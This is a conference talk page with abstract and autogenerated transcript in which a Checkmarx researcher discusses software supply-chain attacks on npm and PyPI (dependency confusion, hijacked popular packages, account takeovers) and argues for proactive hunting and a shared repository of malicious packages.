Conf42 Python 2022 - Online

Why attackers in Code packages are getting a Pass

Video size:

Abstract

Presentation Outline 1. Refresher on recent OSS attack, establishing: - A quick baseline of terminology and concepts, plus a focus on recent major attack found (PHP, Dependency confusion, etc) 2. Lack of visibility The Python Package Index (PyPI) deals with this issue by simply removing the malicious packages without publishing its code or metadata to a central point where the package could be found and researched. Quite similarly, NPM removes all Code and Metadata and place a generic “security holding package” label on the package webpage, although it does publish a security advisory with varying levels of specificity.

Researchers are unable to learn from detected malicious packages. no IOC/contributor data = no hunting for more code packages.

  1. Lack of validation One example is the process of publishing a python package to PyPi allows the publisher to link a GitHub repository to the package, then, PyPi pulls the repository statistics straight from GitHub and presents it on the package web page. The problem is, there is no validation of the connection between the package and the repository. We will demonstrate this technique we came to call StarJacking .
  2. Lack of awareness The entire ecosystem is focused on detecting known Vulnerabilities, many security teams believe this risk Is cover under SCA products. This is not the case, Vulnerabilities ≠ Malware. We need a mindset shift and new technology stack to detect attackers in code packages. Reactive Vs Proactive, Static signature Vs Dynamic execution
  3. Looking ahead Most of what we do today in the field of malicious open-source software can best be described as patch management. The “cyber” point of view has yet to enter this game. In this spirit, some thoughts of where we should be heading: • Malware zoo -> code package hatchery • Sandbox for files -> detonation chambers for dynamic analysis of code • Cross language detection • TTP’s • Bonus – contributors’ reputation

Summary

  • Everybody is using open source. It helped developing product faster and anybody can contributors code to an open source project. Do attackers contribute code as well? Well, the short answer is yes. Supply chain attacks are on the rise.
  • Attack on popular NPM packages affect tens of thousands of organizations worldwide. Chain alert is an early warning system offered free to everyone in the open source community. Created to raise developer awareness and analyze account takeovers.
  • Most of what we are doing today is more of a reactive approach, meaning we wait until somebody else to flag those attacks and then we react to them. We need to have a central repository of malicious packages and their full metadata so researchers like me and other can hunt for OSS hackers and keep our ecosystem clean.

Transcript

This transcript was autogenerated. To make changes, submit a PR.
Hi guys and welcome to my lecture why attackers in code packages are getting a pass. First, let me introduce myself. My name is Sahi. I am the head of software supply can at checkmarks. I have many years of experience in cyber. I used to work in McAfee Symantec, Palo Alto and most recently in Checkmarx. My specialty is building advanced malware resource system. So today I want to talk about Opensource. Everybody is using open source. It helped developing product faster and anybody can contributors code to an open source project, which is a big part why this ecosystem is so successful. Coming from a cyber background, I ask myself, do attackers contribute code as well? Well, the short answer is yes. Let us see. We have studied this attack surface for a really long time, all the recent attacks, and we would be happy to share with you what we have learned about open source, which of course are part of supply chain. And supply chain attacks are on the rise. Let's take a could of example so we will be clear what we are talking about. The first example I want to give is dependency confusion. Dependency confusion is an attack technique that was discovered last year. It was used to hack into a Microsoft Apple Netflix companies by a hectical hacker. It's a new type of can open source supply chain and in many cases this is not a bug, this is a feature. What usually happens with a dependency confusion is when a developer is actually using packages. It will use a combination of internal packages. In this example, my company utils and can external packages like react, the artifact server will etc. The relevant package. But as we can see, there is no by default a clear indication of private or public. So what can happen in this confusion, which is common, is an attacker can guess, just guess the name of an internal package and register that on NPM or Python or other languages. And because anybody can register a package if he was able in guessing the internal name and if this is the default configuration, what will happen, as you can see is he will be able to get his package inside the developer workstation. So if both names are the same, why would the artifact server choose to take the attacker one? As you can see, a lot of the time a developer will mention take the latest version and an attacker can just give himself a very high version number for this attack to succeed. This is not can hypothetical attack. We are seeing those kind of attacks weekly. Just a couple of weeks ago we were able to track down and remove packages that were uploaded by an attacker called never summer 68. When you look at the package, you can first see by the version number which is not a typical version number. This is usually some kind of indication. This can be a dependency confusion. And if you look at the names, you can actually figure out which organization he was trying to target. If a developer was using a part of this information, what was stored inside the package has code that will automatically steal the ssh keys of the developer and will send them to an attacker control website. So this stack is still ongoing and we really believe in giving back to the community. So we have released an open source tool called Dusty Lock that helps monitor this kind of configuration and alert you not to use those internal packages name. Check it out. Another attack that we saw a couple of months ago with a very high impact where two really popular NPM packages were compromised. Can attacker actually uploaded the malicious packages which affect tens of thousands of organizations worldwide? The first package was UA parser and as you can see pointed in red. Those are the malicious part. So he added the first part which actually download the password stealer and then the second part which actually download a crypto miner. It was discovered, they were removed and an official advisory was sent out by CISA. Two weeks later, the same attacker did the same thing. This time compromising packages called COA and RC. And as you can see they are quite popular. This instance he made a bug making has attack unsuccessful, while still crippling a lot of build servers all around the world. We monitor those things constantly and as we can see those attacks are not isolated. We were actually able to find a period attack regarding UA parser and we track this attacker as UNC 3379 inside the industry. We don't think this will be his latest attack. And of course those are not just attacks around NPM, those can happen to in every open source language out there. So as we say, we were able to detect these attackers and alert against them and write about the bugs he created. But this wasn't enough. Why is that? If we study the activity of the attacker, what we call a TTP, we can see that he is constantly compromising NPM accounts and doing what we are calling NPM account takeover. If we look at that, usually an open source contributor will have one GitHub account where he stores has code and another account into NPM in this example. But it could be Python or any other language or maven that store this package. What the attacker is doing is compromising the NPM account. Why is that important? To learn about the habits about the tool significant procedure of an attacker. So usually what happens is when you store your code in GitHub, you can then push it into NPM. When you have the right tag, this is a normal activity and we have seen it many times. This is for example UA parser, and you can see a correlation between the tag and between the package. Until the attack, the attacker uploaded three new versions into NPM, but he wasn't able to compromise the GitHub account. So we never saw their code inside GitHub. This of course can be a reason to suspect and the reason they uploaded three different versions. So we make sure that whatever update policy you are using, you will actually use one of those versions. So the problem for us is, even if we were able as a community to detect and to alert, when you are talking about packages, there are millions of weekly downloads, the amount of time it takes us to monitor, alert and download them, there are still a lot of organization being affected. We wanted to find an innovative way to stay out of the curve for that we have released for the community what we call chain alert can alert is an early warning system offered free to everyone in the open source community. Basically what we are doing is we're monitoring new releases, and whenever we found a new release that has no corresponding code or activity in GitHub, we alert the maintainer. Hey, we just saw a new package being released, but we never saw the code in GitHub. Is that okay or not? We are not saying those are malicious, but we are alerting and monitoring for suspicious activity. So if we found those kind of examples and the attacker will track again, we have a way to quickly identify and maybe avoid those suspicious packages. This is right now what we are doing. We are opening like an issue to the original packages maintainer and also for everybody that described to the project and is using one of those package will get an issue automatically. So we created this to raise developer awareness and analyze account takeovers. And again, as I said, it's a free service for the open source project and the open source community. Feel free to join us or add some feature requests. We'll be happy to get your feedback guys. So this is of course can a lot on GitHub. So why are these attacks so hard to detect? Most of what we are doing today is more of a reactive approach, meaning we wait until somebody else to flag those attacks and then we react to them. So we are not doing a proactive approach, we are not hunting, we are not automatically analyzing everything that's being upload. The problem with being reactive, waiting for somebody else to report it could lead to a long meantime for detection. Meaning we can be under attacks for a really long time until somebody else will notice and then I'll be able to repair that. Another thing is most of the interest still relies on static signatures. This could be a bit problematic when you're trying to stop an attacker because Avalon in the cyber industry, static signatures are quite easily to bypass by an attacker. So let me give you an example of what I mean. Reactive as proactive. I'm going to talk about hunting. We've been doing hunting for many years in cyber. Now how can we hunt in open source? So our story begins with a really cool project I really like called Backstabbers knife collection, which is a couple of people just maintaining a list of malicious packages that were removed into a central repository where researchers can actually take a look at them. So we are always looking for malicious packages. And for this example we'll start with a malicious packages actually uploaded into backstabbers. So this packet was actually flagged maliciously a couple of years ago. And we can see the basic code code and what it was doing. But do we think this is a one time incident or there is an attacker behind it? And if so, what can we learn about this attacker? So every time we came across a malicious package, we don't just remove it or flag it. We are being proactive. We are hunting for it. What do I mean? So I'll show you a couple of our methodologies. So when we are go hunting, we are looking at the metadata. What do we know about this account, this description, those repository, this home page, this owner. What do we know about the IOCs indicator of compromise inside this package, the URL, the domain, the IP cryptocurrency. And then we automatically using our system create a unique import compose and then we start looking for suspicious packages in other languages also and looking at those package. Although we started in Python, based on the unique characteristic that I've shown you, we were actually able to find live packages couple of years later after the first package was removed. So those packages were actually still active and we reported them onto Python to NPM, to Ruby and we will have them removed. This is not something unique. We need to understand this is not a vulnerability, this is not a bug that we just remove. Those are attackers. And we need to change our mindset about how do we approach attackers and how do we track them, how do we hunt them down. We have done this mind shift in cyber with IR. We need to embrace this same mind shift in open source enable to keep our ecosystem clean. So for me this talk is actually a call for action as a researcher who want to keep the open source community clean. We need to have some kind of a central repository of malicious packages. I really like the backstabbers, but I think that we need a more commitment from the major players in the field for a central repository of malicious packages and their full metadata so researchers like me and other can hunt for OSS hackers and keep our ecosystem clean. Thank you guys. I hope hope you find it interesting and I hope we shed some light about recent open source attacks and attackers and the mindset we believe we need in order to not give them a pass, track them, find them, and keep the ecosystem clean. Thank you guys and have a great day.
...

Tzachi Zornstain

Head of CxDustico @ Checkmarx

Tzachi Zornstain's LinkedIn account



Join the community!

Learn for free, join the best tech learning community for a price of a pumpkin latte.

Annual
Monthly
Newsletter
$ 0 /mo

Event notifications, weekly newsletter

Delayed access to all content

Immediate access to Keynotes & Panels

Community
$ 8.34 /mo

Immediate access to all content

Courses, quizes & certificates

Community chats

Join the community (7 day free trial)